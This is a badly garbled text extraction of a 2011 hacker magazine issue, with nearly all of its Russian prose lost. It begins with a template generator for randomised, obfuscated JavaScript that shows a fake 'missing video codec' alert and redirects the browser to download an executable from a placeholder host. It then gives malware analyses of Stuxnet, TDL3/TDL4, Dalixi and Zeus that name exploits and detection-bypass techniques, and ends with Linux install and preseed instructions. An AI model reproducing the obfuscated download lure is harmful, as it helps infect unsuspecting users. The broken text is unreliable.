print "33.33333%"
string :
from string import letters
>>> letters
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu
vwxyz'
letters (), ascii_letters -.
JavaScript. , .
, , JavaScript:
{{ }}
var a = "{{ (" ") }}"
, , -.
, .
MALWARE
080
7/22/2019 2011 01(144).pdf
84/148
server/codec.exe") }}";
}
var {{ rand_var("message") }} = "{{
morf_html_string("You don't have codec for
video") }}";
alert({{ rand_var("message") }});
setTimeout( {{ rand_var("go_codec") }}(),
1000);
{{ random_js_element() }}
,
{{ random_js_element() }}
(). , -
rand_var - {{
rand_var("go_codec") }}.
{{ morf_html_string("http://server/codec.
exe") }}.
, -
.
JavaScript-:
def many_random_js(start=0, stop=5):
rez = ""
for _ in xrange(random.randrange(
start, stop)):
rez += random_js_element()
return rez
{{ many_random_js() }}.
.:
,,
.,
, JavaScript--
., ,.
, ,
?-
.
,
..
PS: , -
,!
(-, ,
,-
, .) :).z
, 2 Python. , collections defaultdict, - rand_var. defaultdict . :
>>> a = defaultdict(generate_string)
>>> a["go_codec"]
dqQSfw
>>> a["location"]
EdstEf
>>> a["go_codec"]
dqQSfw
X 01 (144) 2011
, : http://developer.yahoo.com/yui/com-
pressor/ http://code.google.com/closure/com-piler/ http://jscrambler.com/ http://javascriptob-fuscator.com/ http://www.stunnix.com/prod/jo/ http://www.crock-ford.com/javascript/jsmin.html http://www.daft-logic.com/projects-
online-javascript-obfuscator.htm
TornadoWeb-, http://www.tornad-oweb.org/
links
HTTP://WWW
IDE Python PyCharm .
- :)
081
-, ,
:
location.href = "http://codec/codec.exe";
:
var a = location;
a.href = "http://codec/codec.exe";
a["h"+"ref"] = "http://codec/codec.exe";
, :
var {{ rand_var("location") }} = location;
{{ rand_var("location") }}["{{ morf_html_
string("href") }} "] = "{{ morf_html_
string("http://codec/codec.exe") }}";
7/22/2019 2011 01(144).pdf
85/14882
MALWARE
TO-5
2010
, ESET, www.twitter.com/matrosov
MALWARE
, . ,
, . 2010 , .
082 X 01 (144) 2011
7/22/2019 2011 01(144).pdf
86/14883
>> coding
Stuxnet -
. , Stuxnet
,
.
-
. , .
Stuxnet ()
. -
HIPS-,
-
. , , -
, Realtek JMicron.
Microsoft,
, -
. ? -
MS! , -
MS ,
. ,
, , -
.
.
, Stuxnet -
-
.
-,
-
, , -
, .
0-day
,
-
. -
MS10-046,
, -
LNK/PIF-.
,
. ,
,
-
.
:
MS10-061 Print Spooler, . -
.
MS08-067 , , Conficker.
. ,
, -
, Conficker
.
, Stuxnet
. -
,
,
.
. : Win2000/XP Vista/Win7.
MS10-073 win32k.sys, - Win2000/XP -
.
,
TDL3
0
1
tdl
config.ini
File table
083X 01 (144) 2011
7/22/2019 2011 01(144).pdf
87/14884
MALWAREMALWARE
. ,
Stuxnet . -
.
( Vendor-ID) (Task
Scheduler), - SYSTEM Vista/Win7/Win2008.
.
, ,
. ,
,
( PoC) Microsoft. , -,
:).
CVE-2010-2772, Siemens Simatic
WinCC PCS 7 SCADA, -
Lnk-, Stuxnet
Smartcard API !
TDL4 MBR
MS Internet Explorer ( Zeus)
, - TDL4
084 X 01 (144) 2011
7/22/2019 2011 01(144).pdf
88/14885
>> coding
STUXNET
removable devices Win2000/XP
Vista/Win7/Server 2008
Stuxnet propagationand installation vectors
in MS Windows
local network
MS10-046 MS10-073
MS10-0XXMS08-067
MS10-061
propagation
privilege escalationgeneral attack vector
additionall attack vector privilege escalation
installation
DRIVER_SECTIONpci.sys
DRIVER_SECTIONDriver1.sys
DRIVER_SECTIONDriver2.sys
DRIVER_SECTIONDriverN.sys
DRIVER_SECTIONDriver32k.sys
085
- ( TDL3)
PrintProcessor
IMAGE_FILE_DLL PE-
(AddPrintProcessor)
API
SeLoadDriver
TDL3
X 01 (144) 2011
Microsoft SQL WinCC.
Stuxnet ,
:
-, -
Microsoft
Visual C++. , -
. ,
. -, : -
, .
,
,
.
P2P,
, -
, .
, Stuxnet,
. Stuxnet Under the Microscope
70 ,
-
:).
TDL4, -
64-,
. TDL4
TDL3,
. TDL4
64-
Windows.
,
ShellExecute
(DeletePrintProcessor)
API
7/22/2019 2011 01(144).pdf
89/148
MALWARE
MBR
. -
, Mebroot, StonedBoot . ,
, TDL3 -
-
, , 64-
, -
.
, :
(
\\??\PhysicalDrive0),C:;
( TDL3 );
MBR-,
;
x64--
WinAPI ExitWindowsEx()
ZwRaiseHardError().
:
BIOS
MBR.
TDL4;
-
, ldr16
;
ldr16 13h,. -
(x32
x64), , , ldr32 ldr64;
, ldr32 ldr64,
TDL4, -
API, ;
-
, .
IoCreateDriver()..
TDL4 ,
,
TDL3.
TDL3
,
, , ,
. -
, 3.273.
TDL3 2010 ,
( -
- MS :)) -
HIPS-.
TDL3.
HIPS- WinAPI- AddPrintProcessor
AddPrintProvidor,
HIPS-, Stuxnet
-
X 01 (144) 2011
MALWARE
086
7/22/2019 2011 01(144).pdf
90/148
>> coding
087
. , , , -
,
. , , -
, , ,
-
. TDL3 -
, -
.
BOOL AddPrintProcessor(
__in LPTSTR pName,
__in LPTSTR pEnvironment,
__in LPTSTR pPathName,
__in LPTSTR pPrintProcessorName
);
:
BOOL AddPrintProvidor(
__in LPTSTR pName,
__in DWORD Level,
__in LPBYTE pProviderInfo
);
TDL3 :
;
.
, -
, SE_LOAD_DRIVER_
PRIVILEGE, /.
, WinAPI-
RtlAdjustPrivilge.,
%PrintProcessor% -
AddPrintProcessor/
AddPrintProvidor, -
tdl. RPC-
().
TDL3
. ,
-
.
TDL3 .
-
,
, -
.
TDL3
, .
.
,
TDL3 (,
).
,
.
TDL3
. , -
,
, -
.
:
(tdlcmd.dll);
(config.ini);
(tdl);
(rsrc.dat);
.
, -
() -, TDL3 ,
.
tfd.
exe (TdlFsDumper, http://j.mp/tdl_dump). -
Hex-Rays , -
HIPS
MBR
Stuxnet + + - + - -
TDL4 + + + + - +TDL3 + + + + + -
Dalixi + + + + - +
Zeus2 - + + + + -
X 01 (144) 2011
7/22/2019 2011 01(144).pdf
91/148
MALWARE
FS .
Dalixi
.
, Dalixi HIPS
.
, callback-, -
.
HIPS -
(-
:
PsSetLoadImageNotifyRoutine, PsSetCreateProcessNotifyRoutine,
PsCreateThreadNotifyRoutine).,
, -
. Dalixi
ZwSystemDebugControl,-
ntdll.dll.
NTSYSAPI
NTSTATUS
NTAPI
NtSystemDebugControl(
IN SYSDBG_COMMAND Command,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength,
OUT PULONG ReturnLength OPTIONAL
);
,
SysDbgCopyMemoryChunks_1
, , , .
NtSystemDebugControl
, Dalixi -
SysDbgCopyMemoryChunks_1 ,
.
InputBuffer , -
:
typedef struct _CPY_MEM_CHUNCKS_BUFFER
{
void *Destination;
// pointer to kernel-mode destination buffer
void *Source;
// pointer to user-mode source buffer
ULONG Size;
// size of the user-mode source buffer
} CPY_MEM_CHUNCKS_BUFFER, *PCPY_MEM_CHUNCKS_BUFFER;
, ,
Dalixi -
, -
. callback-.
Zeus 2..-
Zeus.
,
-
(
).
, Zeus,
VNC
Jabber.
X.509--
, , ,
,
. -
CryptoAPI PFXImportCertStore
(
).
HCERTSTORE WINAPI PFXImportCertStore(
__in CRYPT_DATA_BLOB *pPFX,
__in LPCWSTR szPassword,
__in DWORD dwFlags
);
, , ,
Zeus ,
Stuxnet.
, zeus-.
-
, , ,
-.
, -
, .
Zeus -
,
,
MS Internet Explorer
. , ,
,
.
, -
, .
Zeus
.
,
,
-
Smartcard API.
, Zeus,
SpyEye, , ,
, -
. C&C
, -
, .
-
.
-
. -
, -
. z
088
7/22/2019 2011 01(144).pdf
92/148X 01 (144) 2011 089
,
,
-
.,
,
.
,
.-
,,
,.,
,
- (-
, Windows).,
(,
Linux),-
.
-
.
, -
.
, .
-
Linux,
Windows
-
.
UNetbootin
(unetbootin.sourceforge.net) -
-
USB-,
-
.
, Ubuntu (www.
ubuntu.com/desktop/get-ubuntu/windows-
installer) OpenSUSE (en.opensuse.org/
Instlux), UNetbootin (-
Linux, BSD,
Linux).,
, -
grub4dos ISO--
Linux BSD
, : , . , . , , .
7/22/2019 2011 01(144).pdf
93/148X 01 (144) 2011
UNIXOID
090
. .
,
UNIX-, ,
UNIX (,
BSD Linux-). -
UNetbootin, ISO-
initrd-Grub (
BSD).
Windows Linux. , -
. , ,
Solaris
, . -
VirtualBox,
(www.virtualbox.org).
Windows,
VirtualBox-3.2.10-66523-Win.exe.
,
-,
.
, -:
> cd c:\Program Files\Oracle\VirtualBox
> VBoxManage internalcommands createrawvmdk \
-filename c:\realhd.vmdk \
-rawdisk \\.\PhysicalDrive0 -register
realhd.vmdk, C:, -
(\\.\PhysicalDrive0 Windows),
'-register' -
VirtualBox. , ,
Linux :
$ sudo VBoxManage internalcommands \
createrawvmdk -filename ~/realhd.vmdk \
-rawdisk /dev/sda -register
ISO-Linux--
., -
NTFS-Partition MagicWinXP/Win2k3
diskmgmt.mscVista/Seven.
VirtualBox, -
.
, ,
CD-ROM.-
Linux.
, , (
,
VirtualBox). -
,
(
Windows
FreeBSD
7/22/2019 2011 01(144).pdf
94/148X 01 (144) 2011 091
).
,
.DHCP-,-
,
SSH-,
(,-
).
,
SSH.
Windows Linux. UNetbootinUNetbootin (Universal Netboot Installer) -
, USB-
UNIX-UNIX -
.
Windows, Linux,
( Linux BSD)
.,
Ubuntu.
.
unetbootin.sf.net
Download (for Windows for Linux).
( Linux--
).UNetbootin,
, , (NetInstall
HdMedia -
),
, ,
.,
UNetbootin
Linux-,
.
,
(
).,
.
,
ISO-Ubuntu,
.
Ubuntu-10.10 (-
),
(
preseed-).:
1.Ubuntu 10.10
:
$ sudo mount -o loop \
ubuntu-10.10-server-i386.iso /cdrom
$ mkdir mycd
$ rsync -a /cdrom/ mycd
2. preseed- (-
):
$ vi auto.seed
# -
d-i debian-installer/locale string ru_RU
# ,
# ru,
d-i console-setup/ask_detect boolean false
d-i console-setup/layoutcode string us
#
d-i netcfg/choose_interface select auto
# FTP
d-i mirror/protocol string ftp
#
d-i partman-auto/init_automatically_partition select
biggest_free
#
d-i partman-auto/choose_recipe select atomic
# Ext4
d-i partman/default_filesystem string ext4
# ,
d-i partman-partitioning/confirm_write_new_label
boolean true
d-i partman/choose_partition select finish
d-i partman/confirm boolean true
d-i partman/confirm_nooverwrite boolean true
# user ( resu)
d-i passwd/user-fullname string Ubuntu User
FreeBSD Linux. Linux FreeBSD-,
Ubuntu,
UNetbootin, grub,
:
# cd /usr/ports/sysutils/grub
# sudo make install clean
# mkdir /boot/grub
# cp /usr/local/share/grub/i386-freebsd/* /boot/grub/
# touch /boot/grub/menu.lst
# sysctl kern.geom.debugflags=16
# grub-install /dev/ad0
menu.lst:
# vi /boot/grub/menu.lst
title Ubuntu 10.10 AutoInstall
# X, Y, Z ,
, ISO-
map (hdX,Y,Z)/ubuntu-10.10-server-i386-auto.iso
(hd32)
map --hook
chainloader (hd32)
.
7/22/2019 2011 01(144).pdf
95/148X 01 (144) 2011
UNIXOID
d-i passwd/username string user
d-i passwd/user-password-crypted password 458c9bfe3b6
716ad976383cf20a3dcf4
d-i user-setup/allow-password-weak boolean true
#
# kubuntu-desktop ubuntu-server,
tasksel tasksel/first multiselect ubuntu-desktop
# SSH-
d-i pkgsel/include string openssh-server
#
d-i grub-installer/with_other_os boolean true
# (Ubuntu, -)
xserver-xorg xserver-xorg/autodetect_monitor boolean
true
$ sudo cp auto.seed mycd/preseed
, -
us,
,
openssh-server user resu,
SSH.
-
( DHCP), d-i netcfg/choose_interface
select auto , -
:
# DNS-
d-i netcfg/get_nameservers string 8.8.8.8
# IP-
d-i netcfg/get_ipaddress string 192.168.0.1
#
d-i netcfg/get_netmask string 255.255.2
Recommended